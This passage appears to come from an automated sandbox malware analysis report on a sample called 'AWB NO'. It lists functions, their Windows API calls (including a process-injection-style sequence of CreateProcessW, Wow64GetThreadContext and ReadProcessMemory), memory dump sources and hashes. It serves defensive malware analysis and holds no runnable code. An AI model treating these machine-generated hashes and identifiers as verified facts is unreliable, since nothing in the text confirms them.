                                                              • Opcode Fuzzy Hash: f0fdbb26218a1bb658e004d1011d9ada979b51ee7de53ddc263ff604cc63f85f
                                                              • Instruction Fuzzy Hash: FA116D716043119BC300EF29E80591AFBF8EB94714F00853FF545932A2DB749945CB9E
                                                              Function 00405DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405981,?,?,?,?), ref: 00405E27
                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405981,?,?,?,?), ref: 0043E19C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: e75251fc61fee3dd97a9d97ae3d9d621ff28dd73332beceb244147b545394803
                                                              • Instruction ID: b15ea034699987c20ed76bcff485382034201b2fba5cd298639941233e16cb0e
                                                              • Opcode Fuzzy Hash: e75251fc61fee3dd97a9d97ae3d9d621ff28dd73332beceb244147b545394803
                                                              • Instruction Fuzzy Hash: D7017970244708BEF7641F14DC8AF67379CEB05768F10832AFAE56A1D0C6B85D558F58
                                                              Function 00422F95 Relevance: 3.0, APIs: 2, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00429C64), ref: 00422FA9
                                                              • GetLastError.KERNEL32(00000000,?,00429C64), ref: 00422FBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: 8ff9b771085d9567ec29a41600754bdc63d04b6944edad7078705c6a151c7f5e
                                                              • Instruction ID: 32429366bfe4b1456f92093a5c89b28781c311829930e1c0bc43abe6e7c45b58
                                                              • Opcode Fuzzy Hash: 8ff9b771085d9567ec29a41600754bdc63d04b6944edad7078705c6a151c7f5e
                                                              • Instruction Fuzzy Hash: FDE0C231204624ABDB102FB0FE09B9D3BA8AF10754F95083EF508951A0DB788884DB9C
                                                              Function 0103129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01031A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01031AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01031B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                              • Instruction ID: a28ecca11b3fa861cd6a0d6bfdc888ace4a28b7ba4e19d2507a795b3d6e645fc
                                                              • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                              • Instruction Fuzzy Hash: 0B12DD24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                              Function 00405C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405CF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: d223a12a703aeb86b1bf3ab30ab8ff6a31f003c9337a160139487d26f15e49ef
                                                              • Instruction ID: 2007d12f8fabf46d95f9bd6a6110b2a210aedecb5c731aae79855a4659a7f701
                                                              • Opcode Fuzzy Hash: d223a12a703aeb86b1bf3ab30ab8ff6a31f003c9337a160139487d26f15e49ef
                                                              • Instruction Fuzzy Hash: 9E315C31A00B09ABDB18DF29C484A5EB7B5FF88310F14862AD819A7790D735AD50DF95
                                                              Function 004400D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 536d2958fc12bdbc8349080febdff73079b760ca0c0e427e2d7ecf95e0bf56a2
                                                              • Instruction ID: 87dafe0ecff1fea17fbb48996c13aa971f41060bf7b0868cc00f40b9988b33df
                                                              • Opcode Fuzzy Hash: 536d2958fc12bdbc8349080febdff73079b760ca0c0e427e2d7ecf95e0bf56a2
                                                              • Instruction Fuzzy Hash: 85413B74504351CFDB24DF14C484B1ABBE1BF45318F0988AEE9895B7A2C33AEC55CB5A
                                                              Function 00427E93 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042A048: GetStartupInfoW.KERNEL32(?), ref: 0042A052
                                                              • GetCommandLineW.KERNEL32(004BBD38,00000014), ref: 00427F33
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CommandInfoLineStartup
                                                              • String ID:
                                                              • API String ID: 582193876-0
                                                              • Opcode ID: 5860969b08a867fd8b434ac628b02d7dc511bbeafb4d8feb1eef5643009fd3bd
                                                              • Instruction ID: 3005a77a8bcce2dd2565f58a48784dc7dd66e8a240c3e17c94be97e2d11ec89a
                                                              • Opcode Fuzzy Hash: 5860969b08a867fd8b434ac628b02d7dc511bbeafb4d8feb1eef5643009fd3bd
                                                              • Instruction Fuzzy Hash: 2621866070C3319AEB20BB767947B6D21646F5071DFD1446FF904AA1C2DFBC8D4096AD
                                                              Function 00404F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404D13: FreeLibrary.KERNEL32(00000000,?), ref: 00404D4D
                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404F6F
                                                                • Part of subcall function 00404CC8: FreeLibrary.KERNEL32(00000000), ref: 00404D02
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: 5e33b1bddc41a9d72ad00aa2f983e22870215db46146b936cdb20dbf48db967e
                                                              • Instruction ID: 5856fbc04598f8720763e5afc42e8c3a4794c7060b7466c2264c1c7e33684289
                                                              • Opcode Fuzzy Hash: 5e33b1bddc41a9d72ad00aa2f983e22870215db46146b936cdb20dbf48db967e
                                                              • Instruction Fuzzy Hash: 8211E771600606AADB10BF71DC02B6E77A89F84714F10843FFA41B72C1DA7D9A159B59
                                                              Function 004401AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: d6a732fc95337d47391421307c67f3b6cd91de75edb815df4d2ffec2b4ef852a
                                                              • Instruction ID: db6107d04a31b45d08df73f25b53866167db689c77b3171f384f4cae3bd8a944
                                                              • Opcode Fuzzy Hash: d6a732fc95337d47391421307c67f3b6cd91de75edb815df4d2ffec2b4ef852a
                                                              • Instruction Fuzzy Hash: 44210474508351CFDB14DF14C444A1BBBE0BF88304F04896EE989677A1D739E859CB9B
                                                              Function 0042594C Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00421013,?), ref: 0042598F
                                                                • Part of subcall function 0042A408: GetModuleFileNameW.KERNEL32(00000000,004C43BA,00000104,?,00000001,00000000), ref: 0042A49A
                                                                • Part of subcall function 004232DF: ExitProcess.KERNEL32 ref: 004232EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AllocateExitFileHeapModuleNameProcess
                                                              • String ID:
                                                              • API String ID: 1715456479-0
                                                              • Opcode ID: 4833d6cb502ffd9346f135467d44595f2f536ca623f32cd954d38b20aa33ff93
                                                              • Instruction ID: 51681375befe7b4efc193715c803360cbf5942a41623950cdb13c0d60d2addc5
                                                              • Opcode Fuzzy Hash: 4833d6cb502ffd9346f135467d44595f2f536ca623f32cd954d38b20aa33ff93
                                                              • Instruction Fuzzy Hash: 0D01D2B1341B35EEE6157B26F852B6E72588F81775FD0003FF8049A2C1DA7C9D828A6D
                                                              Function 00405D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00405807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405D76
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                              • Instruction ID: 1b1c192e46abdef5abc1ce2f40ab11f3e3992e55af20570062adff39033afecf
                                                              • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                              • Instruction Fuzzy Hash: F2113631200B019FD3308F15C888B67B7E9EF45760F10C92FE4AA96A90D7B8E945CF64
                                                              Function 00404FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404FDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: c578f0c7673a742428f5df3a83c0c51474c58fbbfd29f3087a31c52565afb265
                                                              • Instruction ID: 9f4c00c3caf65de6ea716a0b429dd2d7583c2b82718a0f3f6db7eedc70ddef11
                                                              • Opcode Fuzzy Hash: c578f0c7673a742428f5df3a83c0c51474c58fbbfd29f3087a31c52565afb265
                                                              • Instruction Fuzzy Hash: B3F039B1105712DFCB349F64E494816BBE2BF443293208A3FE2D692A50C739A884DF49
                                                              Function 004209D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004209F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: 1f947ceca2bab918a30033a826e23d76ff136754f543d5ac6781eceffa6a344b
                                                              • Instruction ID: 7974ecc8d6474924d437b965a90c8222220e8c30f7c7811ba04b272f454b6667
                                                              • Opcode Fuzzy Hash: 1f947ceca2bab918a30033a826e23d76ff136754f543d5ac6781eceffa6a344b
                                                              • Instruction Fuzzy Hash: 23E0263290022857C720E2589C05FFAB3ACDF88290F0001BAFC0CD3204D964AC818694
                                                              Function 00405DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0043E16B,?,?,00000000), ref: 00405DBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                              • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                                                              • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                              • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                                                              Function 0046D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 0046D46A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: c995cf8f05118ebdd1a5bebf4633542610973de98432332d8e90c645720ff3eb
                                                              • Instruction ID: 84631651629a030b40b4ad82597bb4a09ef2c41053b2463ee6422853e2e92493
                                                              • Opcode Fuzzy Hash: c995cf8f05118ebdd1a5bebf4633542610973de98432332d8e90c645720ff3eb
                                                              • Instruction Fuzzy Hash: 00714F70A043019FC714EF25D591A6AB7E0AF88318F04456EF896973A2EB38ED45CF5B
                                                              Function 00420E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 03574d3886af59dfc71a17caf98661ac75ab857829cb0cdf1d100c25a781418f
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 3331F270B001159BC728DE48E48496AF7E6FF59300BA58AA6E409CB752DB74EDC1CB89
                                                              Function 010322A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 010322B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: bbf2f798da5b6b8ceed379bc65f14ebf2c30505c6c37a7804e4251f345af24d4
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 16E0E67494010EEFDB00EFB4D9496DE7FB4EF04701F100161FD01D2281D6309D508A72

                                                              Non-executed Functions

                                                              Function 004233C7 Relevance: 120.9, APIs: 35, Strings: 34, Instructions: 193libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000), ref: 004233CA
                                                                • Part of subcall function 0042A764: EncodePointer.KERNEL32(0042A730,004BBE68,00000008,00434D5C), ref: 0042A769
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0042A0E0
                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042A0F4
                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042A107
                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042A11A
                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042A12D
                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0042A140
                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0042A153
                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0042A166
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0042A179
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0042A18C
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0042A19F
                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0042A1B2
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0042A1C5
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0042A1D8
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0042A1EB
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042A1FE
                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0042A211
                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0042A224
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0042A237
                                                              • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 0042A24A
                                                              • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0042A25D
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0042A270
                                                              • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 0042A283
                                                              • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0042A296
                                                              • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 0042A2A9
                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0042A2BC
                                                              • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 0042A2CF
                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 0042A2E2
                                                              • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 0042A2F5
                                                              • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0042A308
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0042A31B
                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0042A32E
                                                              • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 0042A341
                                                              • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 0042A354
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
